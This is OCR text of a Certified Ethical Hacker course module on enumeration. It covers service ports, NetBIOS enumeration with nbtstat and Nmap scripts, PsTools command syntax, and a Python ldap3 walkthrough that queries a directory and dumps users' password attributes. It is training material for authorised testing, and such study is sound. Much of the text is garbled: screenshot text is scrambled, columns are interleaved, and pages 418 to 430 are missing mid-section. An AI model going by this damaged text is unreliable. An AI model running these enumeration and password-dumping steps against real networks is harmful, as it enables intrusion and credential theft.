The previous modules highlighted how attackers gather necessary information about a target without any illegal activity. However, enumeration activities may be illegal depending on the organization's policies and the laws that are in effect. An ethical hacker or pen tester should always acquire proper authorization before performing enumeration.

Module 04 Page 402

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

Techniques for Enumeration

o

Extract usernames using

email IDs

ladecval

Brute force Active Directory

Extract user groups from

C E H Extract information

default passwords

using

(S)

Sy

Extract information using

(5)

Windows

Extract usernames using

SNMP

Techniques for Enumeration The following techniques are used to extract information about a target. =

Extract usernames using email IDs Every email address contains two parts, a username and a domain name, in the format “username@domainname.”

=

Extract information using default passwords Many online resources provide a list of default passwords assigned by manufacturers to their products. Users often ignore recommendations to change the default usernames and passwords provided by the manufacturer or developer of a product. This eases an attacker's task of enumerating and exploiting the target system.

=

Brute force Active Directory

Microsoft Active Directory is susceptible to username enumeration at the time of usersupplied input verification. This is a design error in the Microsoft Active Directory implementation. If a user enables the “logon hours” feature, then all the attempts at service authentication result in different error messages. Attackers take advantage of this to enumerate valid usernames. An attacker who succeeds in extracting valid usernames can conduct a brute-force attack to crack the respective passwords. =

Extract information using DNS Zone Transfer A network administrator can use DNS zone transfer to replicate DNS data across several DNS servers or back up DNS files. For this purpose, the administrator needs to execute a specific zone-transfer request to the name server. If the name server permits zone

Module 04 Page 403

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

transfer, it will convert all the DNS names and IP addresses hosted by that server to ASCII text.

If the network administrators transfer can be an effective network. This information may addresses. A user can perform =

did not configure the DNS server properly, the DNS zone method to obtain information about the organization’s include lists of all named hosts, sub-zones, and related IP DNS zone transfer using nslookup and dig commands.

Extract user groups from Windows To extract user groups from Windows, the attacker should have a registered ID as a user in the Active Directory. The attacker can then extract information from groups in which the user is a member by using the Windows interface or command-line method.

=

Extract usernames using SNMP

Attackers can easily guess read-only or read-write community strings by using the SNMP application programming interface (API) to extract usernames.

Module 04 Page 404

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

Services and Ports to Enumerate TCP/UDP53

=

Domain Name System (DNS) Zone Transfer

fz

CE H

eal

TCP/UDP 135

.

] aS: Q

a

Lightweight Directory Access Protocol (LDAP) TCP 2049

Microsoft RPC Endpoint Mapper

Bs

Network File System (NFS)

UDP 137

[real

Tp 25

NetBIOS Name Service (NBNS)

aaa

Simple Mail Transfer Protocol (SMTP)

TCP 139

so

NetBIOS Session Service (SMB over NetBIOS)

ws)

TCP/UDP 389

Lo

TCP/UDP 162 ‘SNMP Trap

‘SMB over TCP (Direct Host)

NY

UDP

UDP 161

ie

TCP 22

TCP/UDP

445

aga

2

ISAKMP/internet Key Exchange (IKE)

‘Simple Network Management Protocol (SNMP)

500

Secure Shell (SSH)

Services and Ports to Enumerate Transmission Control Protocol (TCP) and User communications between terminals in a network.

Datagram

Protocol

(UDP)

manage

data

TCP is a connection-oriented protocol capable of carrying messages or emails over the Internet. It provides a reliable multi-process communication service in a multi-network environment. The features and functions of TCP include the following: =

Supports acknowledgement for receiving data through a sliding window acknowledgement system

=

Offers automatic retransmission of lost or acknowledged data

=

Allows addressing and multiplexing of data

=

Aconnection can be established, managed, or terminated

=

Offers quality-of-service transmission

=

Offers congestion management and flow control

UDP is a connectionless protocol that carries short messages over a computer provides unreliable service. The applications of UDP include the following: =

Audio streaming

=

Videoconferencing and teleconferencing

Module 04 Page 405

network.

It

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

Services and TCP/UDP ports that can be enumerated include the following. TCP/UDP 53: DNS Zone Transfer

The DNS resolution process establishes communication between DNS clients and DNS servers. DNS clients send DNS messages to DNS servers listening on UDP port 53. If the DNS message size exceeds the default size of UDP (512 octets), the response contains only the data that UDP can accommodate, and the DNS server sets a flag to indicate the truncated response. The DNS client can now resend the request via TCP over port 53 to the DNS server. In this approach, the DNS server uses UDP as a default protocol. In the case of lengthy queries for which UDP fails, TCP is used as a failover solution. Malware such as ADM worm and Bonk Trojan uses port 53 to exploit vulnerabilities within DNS servers, helping intruders launch attacks. TCP/UDP 135: Microsoft RPC Endpoint Mapper

Source: https://docs.microsoft.com RPC is a protocol used by a client system to request a service from a server. An endpoint is the protocol port on which the server listens for the client’s RPCs. The RPC Endpoint Mapper enables RPC clients to determine the port number currently assigned to a specific RPC service. There is a flaw in the part of RPC that exchanges messages over TCP/IP. The incorrect handling of malformed messages causes failure. This affects the RPC Endpoint Mapper, which listens on TCP/IP port 135. This vulnerability could allow an attacker to send RPC messages to the RPC Endpoint Mapper process on a server to launch a denialof-service (DoS) attack. UDP 137: NetBIOS Name Service (NBNS) NBNS, also known as the Windows Internet Name Service (WINS), provides a nameresolution service for computers running NetBIOS. NetBIOS name servers maintain a database of the NetBIOS names for hosts and the corresponding IP address the host is using. NBNS aims to match IP addresses with NetBIOS names and queries. Attackers usually attack the name service first. Typically, NBNS uses UDP 137 as its transport protocol. It can also use TCP 137 as its transport protocol for a few operations, though this might never occur in practice.

TCP 139: NetBIOS Session Service (SMB over NetBIOS) TCP 139 is perhaps the most well-known Windows port. It is used to transfer files over a network. Systems use this port for both null-session establishment as well as file and printer sharing. A system administrator considering the restriction of access to ports ona Windows system should make the restriction of TCP 139 a top priority. An improperly configured TCP 139 port can allow an intruder to gain unauthorized access to critical system files or the complete file system, resulting in data theft or other malicious activities. TCP/UDP 445: SMB over TCP (Direct Host) Windows supports file- and printer-sharing traffic using the SMB protocol directly hosted on TCP. In earlier OSs, SMB traffic required the NetBIOS over TCP (NBT) protocol to work Module 04 Page 406

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

on TCP/IP transport. Directly hosted SMB traffic uses port 445 (TCP and UDP) instead of NetBIOS.

UDP 161: Simple Network Management Protocol (SNMP) SNMP is widely used in network management systems to monitor network-attached devices such as routers, switches, firewalls, printers, and servers. It consists of a manager and agents. The agent receives requests on port 161 from the managers and responds to the managers on port 162. TCP/UDP 389: Lightweight Directory Access Protocol (LDAP) LDAP is a protocol for accessing and maintaining distributed directory information services over an IP network. By default, LDAP uses TCP or UDP as its transport protocol over port 389. TCP 2049: Network File System (NFS) NFS protocol is used to mount file systems on a remote host over a network, and users can interact with the file systems as if they are mounted locally. NFS servers listen to its client systems on TCP port 2049. If NFS services are not properly configured, then attackers may exploit the NFS protocol to gain control over a remote system, perform privilege escalation, inject backdoors or malware on a remote host, etc. TCP 25: Simple Mail Transfer Protocol (SMTP) SMTP is a TCP/IP mail delivery protocol. It transfers email across the Internet and across local networks. It runs on the connection-oriented service provided by TCP and uses the well-known port number 25. Below table lists some commands used by SMTP and their respective syntaxes. Hello

HELO

From

MAIL

FROM:

Recipient

RCPT

TO:

Data

DATA

Reset

RESET

Verify

VRFY

Expand

EXPN

Help

HELP[string]

Quit

QUIT Table 4.1: SMTP commands and their respective syntaxes

TCP/UDP 162: SNMP Trap

An SNMP trap uses TCP/UDP port 162 to send notifications such as optional variable bindings and the sysUpTime value from an agent to a manager.

Module 04 Page 407

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

=

Exam 312-50 Certified Ethical Hacker

UDP 500: Internet Security Association and Key Management Protocol (ISAKMP)/Internet Key Exchange (IKE)

Internet Security Association and Key Management Protocol (ISAKMP)/Internet Key Exchange (IKE) is a protocol used to set up a security association (SA) in the IPsec protocol suite. It uses UDP port 500 to establish, negotiate, modify, and delete SAs and cryptographic keys in a virtual private network (VPN) environment. =

TCP 22: Secure Shell (SSH) Secure Shell (SSH) is a command-level protocol mainly used for managing various networked devices securely. It is generally used as an alternative protocol to the unsecure Telnet protocol. SSH uses the client/server communication model, and the SSH server, by default, listens to its client on TCP port 22. Attackers may exploit the SSH protocol by brute-forcing SSH login credentials.

=

TCP/UDP 3268: Global Catalog Service Microsoft’s Global Catalog server, a domain controller that stores extra information, uses port 3268. Its database contains rows for every object in the entire organization, instead of rows for only the objects in one domain. Global Catalog allows one to locate objects from any domain without having to know the domain name. LDAP in the Global Catalog server uses port 3268. This service listens to port 3268 through a TCP connection. Administrators use port 3268 for troubleshooting issues in the Global Catalog by connecting to it using LDP.

=

TCP/UDP 5060, 5061: Session Initiation Protocol (SIP) The Session Initiation Protocol (SIP) is a protocol used in Internet telephony for voice and video calls. It typically uses TCP/UDP port 5060 (non-encrypted signaling traffic) or 5061 (encrypted traffic with TLS) for SIP to servers and other endpoints.

=

TCP 20/21: File Transfer Protocol FTP is a connection-oriented protocol used for transferring files over the Internet and private networks. FTP is controlled on TCP port 21, and for data transmission, FTP uses TCP port 20 or some dynamic port numbers depending on the server configuration. If attackers identify that FTP server ports are open, then they perform enumeration on FTP to find information such as the software version and state of existing vulnerabilities to perform further exploitations such as the sniffing of FTP traffic and FTP brute-force attacks.

=

TCP 23: Telnet The Telnet protocol is used for managing various networked devices remotely. It is an unsecure protocol because it transmits login credentials in the cleartext format. Therefore, it is mostly used in private networks. The Telnet server listens to its clients on port 23. Attackers can take advantage of the Telnet protocol to perform banner grabbing on other protocols such as SSH and SMTP, brute-forcing attacks on login credentials, portforwarding attacks, etc.

Module 04 Page 408

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

=

Exam 312-50 Certified Ethical Hacker

UDP 69: Trivial File Transfer Protocol (TFTP) TFTP is a connectionless protocol used for transferring files over the Internet. TFTP depends on connectionless UDP; therefore, it does not guarantee the proper transmission of the file to the destination. TFTP is mainly used to update or upgrade software and firmware on remote networked devices. It uses UDP port 69 for transferring files to a remote host. Attackers may exploit TFTP to install malicious software or firmware on remote devices.

=

TCP 179: Border Gateway Protocol (BGP)

BGP is widely used by Internet service providers (ISPs) to maintain huge routing tables and for efficiently processing Internet traffic. BGP routers establish sessions on TCP port 179. The misconfiguration of BGP may lead to various attacks such as dictionary attacks, resource-exhaustion attacks, flooding attacks, and hijacking attacks.

Module 04 Page 409

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

C/EH

LO#02: Demonstrate Different Techniques for NetBIOS Enumeration

Al RightsReserved. Re

NetBIOS Enumeration @

nis Strictly Prohibit

CE H

A NetBIOS name is a unique 16 ASCII character string used to identify the network devices over TCP/IP; fifteen characters are used for the device name, and the sixteenth character is reserved for the service or name record type

NetBIOS

Attackers use the NetBIOS enumeration to obtain

© Thelist of computers that belongto a domain © Thelist of sharesonthe individual hostsin the network © Policies and passwords

one

name list

Information Obtained





UNIQUE GROUP UNIQUE UNIQUE

Hostname Domain name Messenger service running forthe computer Messenger service running for the logged-in user



UNIQUE

Server service running



GROUP

Master browser name for the subnet.

oom

UNIQUE

Domain master browser name, identifies the

host name>

primary domain controller (PDC) forthe domain

Note: NetBIOS name resolutionis not supported by Microsoft for Internet Protocol Version 6 (IPv6)

Module 04 Page 410

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

NetBIOS Enumeration (Cont’d)

if :

@ The nbtstat utility in Windows displays NetBIOS over TCP/IP (NetBT) protocol statistics, NetBIOS name tables for both the local and remote computers, and the NetBIOS name cache @ Runthe nbtstat command “nbtstat ~ a "”to obtain the NetBIOS name table of a remote computer

@ Runthe nbtstat command “nbtstat -c" to obtain the contents of the NetBIOS name cache, table of NetBIOS names, and their resolved IP addresses Administrator: Command Prompt

Copyright © by

NetBIOS Enumeration This section describes NetBIOS enumeration, the information obtained, and various NetBIOS enumeration tools. NetBIOS is considered first for enumeration because it extracts a large amount of sensitive information about the target network, such as users and network shares.

The first step in enumerating a Windows system is to take advantage of the NetBIOS API. NetBIOS was originally developed as an API for client software to access local area network (LAN) resources. Windows uses NetBIOS for file and printer sharing. The NetBIOS name is a unique 16character ASCII string assigned to Windows systems to identify network devices over TCP/IP; 15 characters are used for the device name, and the 16th is reserved for the service or record type. NetBIOS uses UDP port 137 (name services), UDP port 138 (datagram services), and TCP port 139 (session services). Attackers usually target the NetBIOS service because it is easy to exploit and run on Windows systems even when not in use. Attackers use NetBIOS enumeration to obtain the following: =

The list of computers that belong to a domain

=

The list of shares on the individual hosts in a network

=

Policies and passwords

An attacker who finds a Windows system with port 139 open can check to see which resources can be accessed or viewed on a remote system. However, to enumerate the NetBIOS names, the

remote system must have enabled file and printer sharing. NetBIOS enumeration may allow an attacker to read or write to a remote computer system, depending on the availability of shares, or launch a DoS attack.

Module 04 Page 411

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Enumeration

Name

NetBIOS

Exam 312-50 Certified Ethical Hacker

5 . Information Obtained

Code

Type

UNIQUE

| Hostname



GROUP

Domain



UNIQUE | Messenger service running for the computer



UNIQUE | Messenger service running for the logged-in user

|



name

| UNIQUE | Server service running



GROUP | Master browser name for the subnet

'

UNIQUE Q



GROUP | Browser service elections

Domain master browser name, which identifies the primary domain controller (PDC) for the domain

Table 4.2: NetBIOS name list

Note that Microsoft does not support NetBIOS name resolution for IPv6. Nbtstat Utility

Source: https://docs.microsoft.com Nbtstat is a Windows utility that helps in troubleshooting The nbtstat command removes and corrects preloaded switches. Attackers use Nbtstat to enumerate information protocol statistics, NetBIOS name tables for both local and name cache.

NETBIOS name resolution problems. entries using several case-sensitive such as NetBIOS over TCP/IP (NetBT) remote computers, and the NetBIOS

The syntax of the nbtstat command is as follows: nbtstat [-a RemoteName] [-S] [Interval]

[-A

IP

Address]

[-c]

[-n]

[-r]

[-R]

[-RR]

[-s]

The table shown below lists various Nbtstat parameters and their respective functions. Nbtstat

Function

Parameter -a

RemoteName

Displays the NetBIOS name table of a remote computer, where RemoteName is the NetBIOS computer name of the remote computer

-A

IP

Displays the NetBIOS name table of a remote computer, specified by the IP address (in dotted decimal notation) of the remote computer

Address

-c

Lists the contents of the NetBIOS name cache, the table of NetBIOS names and

their resolved IP addresses

na

Displays the names registered locally by NetBIOS applications such as the server and redirector

“xr

Displays a count of all names resolved by a broadcast or WINS server

Module 04 Page 412

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

-R -RR

Exam 312-50 Certified Ethical Hacker

Purges the name cache and reloads all #PRE-tagged entries from the Lmhosts file Releases and re-registers all names with the name server

-s

Lists the NetBIOS sessions table converting destination IP addresses to computer

-s

Lists the current NetBIOS sessions and their status with the IP addresses

Interval

NetBIOS names

Re-displays selected statistics, pausing at each display for the number of seconds specified in Interval Table 4.3: Nbtstat parameters and their respective functions

The following are some examples for nbtstat commands. =

The nbtstat command “nbtstat -a ” can

x

Figure 4.1: Nbtstat command to obtain the name table of a remote system

=

The nbtstat command “nbtstat -c” can be executed to obtain the contents of the NetBIOS name cache, the table of NetBIOS names, and their resolved IP addresses. IB¥ Administrator: Command Prompt

-

ao

x

Figure 4.2: Nbtstat command to obtain the contents of the NetBIOS name table

Module 04 Page 413

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

NetBIOS Enumeration Tools NetBIOS Enumerator

NetBIOS Enumerator helps to enumerate details, such

|ssetios names, Usemames, Domain sas end MAC addresses, for a given range of IP addresses

CE H

Nmap| targets’ Nmo@’snbstat NS script allow attackers to retrieve NetBIOS namesan addresses

‘Obtain information, such as NetBIOS names, Usernames, domain ‘names, and MAC ‘addresses

etp//notenum sourceforge.net Other NetBIOS

Global Network Inventory

Enumeration Tools: ittp/wmmognetosof.com

Advanced IP Scanner

Hyena

Nsauditor Network Security Auditor

‘ee://uona obvancedip-scanner.com —https://wwu.systemtools.com —https://www.nsoudtor.com Copyright © by

Al Rights Reserved. Reproduction i

NetBIOS Enumeration Tools NetBIOS enumeration tools explore and scan a network within a given range of IP addresses and lists of computers to identify security loopholes or flaws in networked systems. These tools also enumerate operating systems (OSs), users, groups, Security Identifiers (SIDs), password policies, services, service packs and hotfixes, NetBIOS shares, transports, sessions, disks and security event logs, etc. =

NetBIOS Enumerator

Source: http://nbtenum.sourceforge.net NetBIOS Enumerator is an support and to deal with screenshot, attackers use names, usernames, domain range of IP addresses.

Module 04 Page 414

enumeration tool that shows how to use remote network some other web protocols, such as SMB. As shown in the NetBIOS Enumerator to enumerate details such as NetBIOS names, and media access control (MAC) addresses for a given

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

#2 Ne05Enumentr

-

setwer_|

0

x

Debug window Scanning fon: 10,10.1.15 tor 10.10.1.23 Ready! Attackers specify an IP range to

©

WD Mac: 02-15-54-13-248 & Round Trp Tene (RTT): O ms -Tme To Live (TT): 128 10.10,1.22 (SERVER2022} ‘SERVER2022 - Workstation Service

enumerate NetBIOS information Obtain information, such

Cot-Doman None CEA - Domain Contraber SERVER2022 - Fle Server Service By CEH - Domain Master Bromser [F Username: vo one loggedon) & paDoman: CoH

as NetBIOS names,

WY MAC: 00-15-54-01-8002 & Rou Trp nd Tene (RTT: O ms -Tm To Livee(TT): 128

usernames, domain names, and MAC

addresses

Figure 4.3: Screenshot of NetBIOS Enumerator

=

Nmap Source: https://nmap.org Attackers use the Nmap Scripting Engine (NSE) for discovering NetBIOS shares on a network. The NSE nbstat script allows attackers to retrieve the target’s NetBIOS names and MAC addresses. By default, the script displays the name of the computer and the logged-in user. However, if the verbosity is turned up, it displays all names related to that system.

As shown in the screenshot, an attacker uses the following Nmap command to perform NetBIOS enumeration on a target host: nmap

Module 04 Page 415

-sV

-v

--script

nbstat.nse

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

File

Edit

View

Exam 312-50 Certified Ethical Hacker

Search

Terminal

Help

attacker@

nbstat.nse -sV -v --script nmap ( https://nmap.org Starting Nmap 7.92 for scanning. Loaded 46 scripts INSE:

INSE:

Script

10.10.1.22 ) at 2022-03-21

03:31

EDT

Pre-scanning.

Initiating NSE at 03:31 Completed NSE at 03: Initiating NSE at 03:31 Completed NSE at 03:31,

©.00s

elapsed

0.00s

elapsed

ermina Help B389/tcp

pervice

1

open

Info:

ms-wbt-server

Host:

SERVER2@22;

lost script result nbstat: NetBIOS name: 1.0602

Microsoft

0S:

SERVER2022,

Terminal

Windows;

NetBIOS

CPE:

user:

Services

cpe:/o:microsoft:windows

,

NetBIOS

MAC:

00:15:

(Microsoft)

1 : SERVER2022 J J SERVER2022 | CEH J CEH j_CEH

Flags: Flags: Flags: Flags: Flags:





Figure 4.5: Screenshot of Nmap NetBIOS enumeration output

The following are some additional NetBIOS enumeration tools:

=

Global Network Inventory (http://www.magnetosoft.com)

=

Advanced IP Scanner (https://www.advanced-ip-scanner.com)

=

Hyena (https://www.systemtools.com)

=

Nsauditor Network Security Auditor (https://www.nsauditor.com)

Module 04 Page 416

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

Enumerating User Accounts

CE H

@ Enumerating user accounts using the PsTools suite helps to control and manage remote systems from the command line PsExec - executes processes remotely

PsList - lists detailed information about processes

PsFile - shows files opened remotely

PsLoggedOn - shows who is logged on locally and Via resourcesharing

PsGetSid- displays the SID of a computeror user

PsLoglist - dumps event log records

Pskill - kills processes by name or process ID

PsPasswd - changes account passwords PsShutdown - shuts down and optionally reboots a

Psinfo- lists information about a system

computer

ttps:/fdocs microsoft.com

Enumerating User Accounts

Source: https://docs.microsoft.com Enumerating user accounts using the PsTools suite helps in controlling and managing remote systems from the command line. The following are some commands for enumerating user

accounts.

PsExec

PsExec is a lightweight Telnet replacement that can execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. PsExec’s most powerful use case is the launch of interactive command prompts on remote systems and remote-enabling tools such as ipconfig that otherwise cannot show information about remote systems. The syntax of the PsExec command is as follows: psexec n

[\\computer[,computer2[,...] s][-r

executable

servicename] [-f|-v]][-w

[-h]

[-1]

directory]

|

@file]][-u

[-s|-e]

[-d]

[-x]

user

[-i

[-]

[-p

psswd]

[-

[session]][-c [-a

n,n,...]

cmd

[arguments]

PsFile PsFile is a command-line utility that shows a list of files on a system that opened remotely, and it can close opened files either by name or by a file identifier. The default behavior of PsFile is to list the files on the local system opened by remote systems. Typing a command followed by "-" displays information on the syntax for that command.

Module 04 Page 417

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

The syntax of the PsFile command is as follows: psfile

[\\RemoteComputer

[-c]]

=

[-u

Username

[-p

Password]]]

[[Id

|

path]

PsGetSid PsGetSid translates SIDs to their display name and vice versa. It works on built-in accounts, domain accounts, and local accounts. It also displays the SIDs of user accounts and translates an SID into the name that represents it. It works across the network to query SIDs remotely. The syntax of the PsGetSid command is as follows: psgetsid

[\\computer[,computer[,...]

password]]]

=

|

@file]

[-u

username

[-p

[account|SID]

PsKill PsKill is a kill utility that can kill processes on remote systems and terminate processes on the local computer. Running PskKill with a process ID directs it to kill the process of that ID on the local computer. If a process name is specified, PsKill will kill all processes that have that name. One need not install a client on the target computer to use PsKill to terminate a remote process. The syntax of the PskKill command is as follows: pskill name |

=

[- ] [-t] [\\computer process id>

[-u

username]

[-p

password]]

Start Scanning Il

Host name

Uptime

Server2019

2890148822 (33, Hardware Inte ‘As Web (HTTP)

Remote Suspend / Hibernate Assign Friendly Name Send Message. Create Batch File Delete from List

Ready

x

) SO ONMSO®

|OpenDevice Copy Properties Rescan Device Setup Fiter Wake-On-LAN Remote Shutdown

Q ss. Dy Users

o

>] >) >] >|

System Descri. System Contact _ System Location

AsSecure Web (HTTPS) ‘As File Server (FTP) AsTelnet AsTelnetto.. Computer Management Remote Desktop

Chis Ceo

6/6

Figure 4.12: Screenshot of SoftPerfect Network Scanner

The following are some additional SNMP enumeration tools: =

Network Performance Monitor (https://www.solarwinds.com)

=

OpUtils (https://www.manageengine.com)

=

PRTG Network Monitor (https://www.paessler.com)

=

Engineer’s Toolset (https://www.solarwinds.com)

Module 04 Page 431

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Enumeration

C/EH

LO#04: Use Different Techniques for LDAP Enumeration

Al Rights Reserved. Reproduction i Stricty Prohibited

LDAP Enumeration

CE H

Lightweight directory access protocol (LDAP) is an Internet protocolfor accessing distributeddirectory services Directory services may provide any organized set of records, often ina hierarchical and logical structure, such as a corporate email directory

rd

A clientstarts a LDAP session by connecting toa directory system agent (DSA) on TCP port 389 and then sendsan operation request to the DSA Information is transmitted between the client and server using basic encoding rules (BER)

SI

Attackers query the LDAP service to gather information, suchas valid usernames, addresses, and departmental details, which can be further used to perform attacks

served Reproduction i

LDAP Enumeration Various protocols enable communication and manage data transfer between network resources. All these protocols carry valuable information about network resources along with the data. An external user who successfully enumerates that information by manipulating the protocols can break into the network and may misuse the network resources. The Lightweight Directory Access Protocol (LDAP) is one such protocol that accesses the directory listings. This section focuses on

Module 04 Page 432

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

LDAP enumeration, the information extracted via LDAP enumeration, tools.

and

LDAP enumeration

LDAP is an Internet protocol for accessing distributed directory services. LDAP accesses directory listings within Active Directory or from other directory services. LDAP is a hierarchical or logical form of a directory, similar to a company’s organizational chart. Directory services may provide any organized set of records, often in a hierarchical and logical structure, such as a corporate email directory. It uses DNS for quick lookups and the fast resolution of queries. A client starts an LDAP session by connecting to a Directory System Agent (DSA), typically on TCP port 389, and sends an operation request to the DSA. The Basic Encoding Rules (BER) format is used to transmit information between the client and server. An attacker can anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names, which an attacker can use to launch attacks.

Module 04 Page 433

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

Manual and Automated

LDAP

Enumeration

Manual LDAP Enumeration @ Attackers perform manual LDAP enumeration using Python to fetch information such as the domain name, naming context, and directory objects

Automated LDAP Enumeration @ Attackers use the Idap-brute NSE script to brute-force LDAP authentication

Copyright © by

Alig

iy Prohibited.

Manual and Automated LDAP Enumeration Attackers can use both manual and automated approaches for LDAP enumeration. Some of the commands that can be used for LDAP enumeration are as follows. Manual LDAP Enumeration Attackers can perform manual LDAP enumeration using Python. Follow the steps given below to perform manual LDAP enumeration using Python. 1.

Using Nmap, check whether the target LDAP server is listening on port 389 for LDAP and port 636 for secure LDAP.

2.

If the target server is listening on the specified ports, initiate the enumeration process by installing LDAP using the following command: pip3

install

ldap3

3.

As shown in the code given below, create a server object (server), specify the target IP address or hostname and port number. If the target server is listening on secure LDAP, specify use_ssl = True.

4.

Retrieve the Directory System Agent specifying get_info = ldap3.ALL.

5.

Now, create a connection object, connection, and initiate a call to bind ().

Module 04 Page 434

(DSA)-specific entry

(DSE)

naming

contexts

by

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Enumeration

6.

Exam 312-50 Certified Ethical Hacker

If the connection is successful, True is displayed on the screen as follows: >>>

import

ldap3

>>> server = ldap3.ALL, port

I1dap3.Server('Target =389)

>>>

connection

=

ldap3.Connection

>>>

connection.bind()

IP

Address',

get_info

(server)

True

7.

Now, one can fetch information such as the domain name and naming context using the following script: >>>

server.info

ord for attacker arrot #python3 Python 3.9.2 (default, Feb 28 2621, 17:03:44) [GCC 1 26210110] on Linux Type "help", "copyright", "credits" or "license" for more information import dap3 > server=ldap3.Server('10.10.1.22',get_info=ldap3.ALL, port= > connection=1dap3.Connection(server) ‘onnection.bind() True >>>

server.info

DSA info (from DSE) Supported LDAP ver laming contexts

onfigur schema, For Supported 1 1 1 1.2.840. 1.2 1

CN=Config

=CEH, DC=com 3 -

zs i

113556

8

Verify name - Control - MICRO! Domain scope - Control - MICR Search options - Control ODC DCPROMO - Control Permissive modify - Control - MICROSOFT

Attribute scoped query - Control - MICROSOFT MICROSOET Control. liser quota.

Figure 4.13: Screenshot showing LDAP enumeration using Python script

Module 04 Page 435

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Enumeration

8.

Exam 312-50 Certified Ethical Hacker

After obtaining the naming context, retrieve all the directory objects using the script given below: >>> connection.search (search_base='DC=DOMAIN,DC=DOMAIN', search filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') True

>>

connection.entries

Search Terminal Help >>> connection. search(search_base='DC=CEH,DC=com',

IBTREE'

, attributes='*')

True. swconnection. entries] [DN: DC=CEH,DC=com ‘ATUS: auditingPol

reationTime:

dSASignature:

Read - READ TIME:

search

filter='(&(objectclass=*))',search_scope='SU)

2022-03-29T06:50:11.036562

132930309893191915

b'\xO1\x80\x00\x00(\x00\x00\x00\ x00\x80\ x00\x00\ x00\ x00\x00\ x00\x00\x80\x00\x00\ x06}

x00\x00\Xx00\x9e\x89\xc2D\xF5!\x9fM\x9cd\

opagationData:

16010101000000.0Z

Dcm o c = C D , H CN=NTDS Settings, Ch E C = C D , n o i bnfigurat ff 45F 9 . 4 o 5 2 g 8 D o 6 1 L 3 1 e 0 c 2 r D 7 fo 33 B2F340-@16 gPLink: Ty[pLeD:AP: //CN={31 instance lSystem5Object: isCriticOabservationWindo TRUE 00000000 0 8 lockOut ation: 1 8000000000 1 ockoutDur d: utThreshol 0 JER2 By: CN=NTDS Settir ‘ation, DC=CEH, DC=c 808 e 5 g 7 A 7 d 4 w 5 P 8 x 6 a 3 0 m : e g A d w minP @ : h t g n minPwdLe ount: 0 om: modifiedC tLa1stPr dCountA e i f i d o m

ot Termin

xd8X\x91dB\xbf

C

>

9}, F 4 8 9 B F 4 O C -00

Sitet s r i F t faul

Nat

CN=Polic

Si t s r i F t N=Defaul

© : a t o u Q ccount 10 Quota: 1000

Figure 4.14: Screenshot showing output of LDAP enumeration 9.

Now, use the following script to dump the entire LDAP: >>

connection.search

(search_base='DC=DOMAIN,DC=DOMAIN'

search filter='(&(objectClass=person))', attributes='userPassword')

,

search_scope='SUBTREE',

True

>>>

connection.entries

Module 04 Page 436

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Enumeration

Exam 312-50 Certified Ethical Hacker

Automated LDAP Enumeration

